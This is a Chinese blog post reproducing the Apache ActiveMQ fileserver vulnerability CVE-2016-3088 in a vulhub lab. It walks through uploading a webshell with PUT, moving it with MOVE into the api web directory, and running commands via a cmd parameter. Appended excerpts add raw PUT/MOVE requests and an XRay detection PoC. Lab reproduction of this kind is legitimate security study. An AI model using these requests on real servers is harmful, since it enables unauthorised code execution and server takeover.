Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现

最新推荐文章于 2025-04-09 21:03:09 发布
原创 最新推荐文章于 2025-04-09 21:03:09 发布 · 937 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java-activemq #apache #activemq #网络安全

当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场(所有实验均为虚拟环境)
实验环境:攻击机----kali
靶机:centos7
1、进入环境cd activemq/CVE-2016-3088/(靶机)
在这里插入图片描述
2、启动环境:docker-compose up -d(靶机)
在这里插入图片描述
3、查看启动情况:docker ps(靶机)
在这里插入图片描述
4、进入ActiveMQ :http://your-ip:8161/admin/test/systemProperties.jsp(攻击机)
查看ActiveMQ路径
在这里插入图片描述
5、生成webshell(网上随便找,多的一批)
上传webshell到/fileserver/1.txt(攻击机)
返回状态204为上传成功
在这里插入图片描述
6、查看/fileserver/1.txt在这里插入图片描述
7、然后将上传的webshell移到/opt/activemq/webapps/api/1.jsp
在这里插入图片描述
8、查看api接口目录,移动成功
在这里插入图片描述
9、访问1.jsp,直接访问会报错
在这里插入图片描述
10、使用命令执行http://X.X.X.X:8161/api/1.jsp?cmd=ls
执行成功
在这里插入图片描述
在这里插入图片描述

千其昂cm
关注
activemq 远程代码执行CVE-2016-3088
qq_32445755的博客
03-31 649
简介 ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行
Active MQ 任意文件写入漏洞/远程代码执行漏洞CVE-2016-3088
初岄的博客
09-13 1468
Active MQ 任意文件写入漏洞/远程代码执行漏洞CVE-2016-3088
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)
2401_84968269的博客
05-13 1306
近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记录。
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
热门推荐
huangyongkang666的博客
10-31 1万+
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现及排查
dayouzi的博客
08-14 2814
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
漏洞复现ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 831
Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
Apache ActiveMQ RCE漏洞复现CVE-2023-46604)
0xSec
10-26 9486
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行
漏洞复现(1)ActiveMQ任意文件上传漏洞——(CVE-2016-3088
Zeu_s的博客
10-20 1797
本次漏洞产生主要原因是Fileserver支持写入文件,不解析jsp,但是支持移动文件(Move),因此我们将jsp的文件PUT到Fileserver下,再通过Move指令移动到可执行的目录下访问。在漏洞爆发后使用fileserver的用户便减少了,导致截止最新版本已经删除了该功能。本篇文章还会制作更多漏洞复现后续,欢迎大家讨论,或者大家想看哪个漏洞复现,可以在评论区进行讨论。
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2016-3088)
又菜又爱倒腾的博客
10-29 2123
#Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)# 一、漏洞简介 ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。 2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 A
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现
m0_69994768的博客
01-23 1496
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)
最新发布
spinage的博客
04-09 1233
攻击者可通过构造恶意HTTP请求,上传JSP Webshell至Web应用目录,最终实现任意代码执行,完全控制服务器。
Apache ActiveMQ 远程代码执行漏洞分析
蚁景网安学院
01-09 1537
Apache ActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制Apache ActiveMQ服务器。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3305
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
Apache ActiveMQ Jolokia 远程代码执行漏洞CVE-2022-41678)
Flag少侠的博客
10-19 2510
Apache ActiveMQ是一个流行的开源、基于Java的消息代理,支持多种协议,能够为不同语言和平台的客户端提供服务。它支持AMQP、STOMP、MQTT等多种消息协议,能够满足各种消息使用场景。ActiveMQ分为两个版本:经典版(Classic)和下一代版本(Artemis)。经典版拥有成熟的架构和广泛的插件支持,而Artemis版则提供了高性能、非阻塞的架构,适用于新一代的消息应用。
漏洞复现-Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
玄道的网安博客
08-11 1486
Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。类, 然后重写对应的逻辑,这样在运⾏的时候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。然后随便打⼏个断点试试 (注意在⼀次通信的过程中。获取到了对应的序列化器之后, 会调⽤它的。⽅法, 后者可以调⽤任意类的带有⼀个。⼀些其它的数据, 调试的时候记得判断)⽅法的利⽤, 这块其实跟。
ActiveMQ 远程代码执行漏洞cve-2022-41678复现
weixin_42786460的博客
12-16 2279
ActiveMQ 远程代码执行漏洞cve-2022-41678复现
三、【漏洞复现ActiveMQ Fileserver远程代码执行漏洞
weixin_52351575的博客
09-20 892
ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。此漏洞出现在Fileserver应用程序中,该漏洞的原理实际上非常简单,即文件服务器支持写入文件(但不解析JSP),同时支持移动文件(MOVE请求)。1、编写Webshel​​l(方便,但文件服务器不需要解析jsp,admin和api都需要登录才能访问)
Activemq远程代码执行漏洞
hackerie的博客
09-08 1375
https://www.seebug.org/vuldb/ssvid-96268
AvtiveMQ任意文件上传漏洞(CVE-2016-3088)漏洞复现
03-19
### CVE-2016-3088 漏洞概述 CVE-2016-3088Apache ActiveMQ 的一个任意文件写入漏洞,主要由于 `fileserver` 应用未受保护且允许通过 HTTP 请求创建和移动文件。此漏洞影响的版本范围为 Apache ActiveMQ 5.x 至 5.14.0 版本[^3]。 --- ### 环境准备 为了复现漏洞,需搭建受影响的环境: #### 使用 VulnHub 靶场 VulnHub 提供了一个方便的漏洞测试平台,可以快速部署目标服务。按照以下步骤操作: 1. 下载并启动 Docker 或虚拟机镜像。 2. 安装指定版本的 Apache ActiveMQ(如 5.13.0),确保其配置启用了 `fileserver` 功能。 3. 修改 `conf/jetty.xml` 文件中的 `<bean>` 节点,启用 `fileserver` Web 应用程序。 ```bash docker run --name activemq -p 8161:8161 webcenter/activemq:5.13.0 ``` 上述命令会运行一个容器化的 ActiveMQ 实例,并将其管理端口映射到主机上的 8161 端口。 --- ### 漏洞验证方法 #### 利用工具或手动发送请求 可以通过向 `/fileserver/{filename}` 发送 `PUT` 请求来验证是否存在漏洞。以下是具体过程: 1. **构造恶意请求** 向服务器发送一个带有自定义数据体的 `PUT` 请求,尝试在 `fileserver` 中创建新文件。 ```http PUT /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Content-Type: text/plain Content-Length: 17 This is a test file. ``` 2. **确认文件已成功上传** 访问路径 `/fileserver/test.txt` 并查看返回的内容是否匹配预期的数据。 3. **执行 MOVE 方法** 将刚刚创建的文件移动至其他目录下,例如 Tomcat 的根目录或其他可加载的位置。 ```http MOVE /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Destination: http://localhost:8161/tomcat/webapps/root/shell.jsp Overwrite: T ``` 如果一切正常,则会在目标位置生成新的 JSP 文件,从而实现远程代码执行的效果。 --- ### 自动化检测脚本 (POC) XRay 工具提供了针对 CVE-2016-3088 的自动化扫描功能,下面是一个简单的 YAML 格式的 POC 描述文件[^4]: ```yaml name: poc-yaml-activemq_CVE-2016-3088 set: r1: randomInt(5, 10) r2: randomLowercase(r1) rules: - method: PUT path: /fileserver/{{r2}} expression: | response.status == 204 detail: author: laura_lion links: - https://github.com/Laura0xiaoshizi ``` 将以上内容保存为 `.yaml` 文件后导入 XRay 执行即可完成批量探测工作。 --- ### 注意事项 尽管漏洞利用相对简单,但在实际环境中应严格遵循法律规范,仅限于授权范围内进行渗透测试活动。此外,在生产环境下务必及时更新软件补丁以防止此类安全风险的发生。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值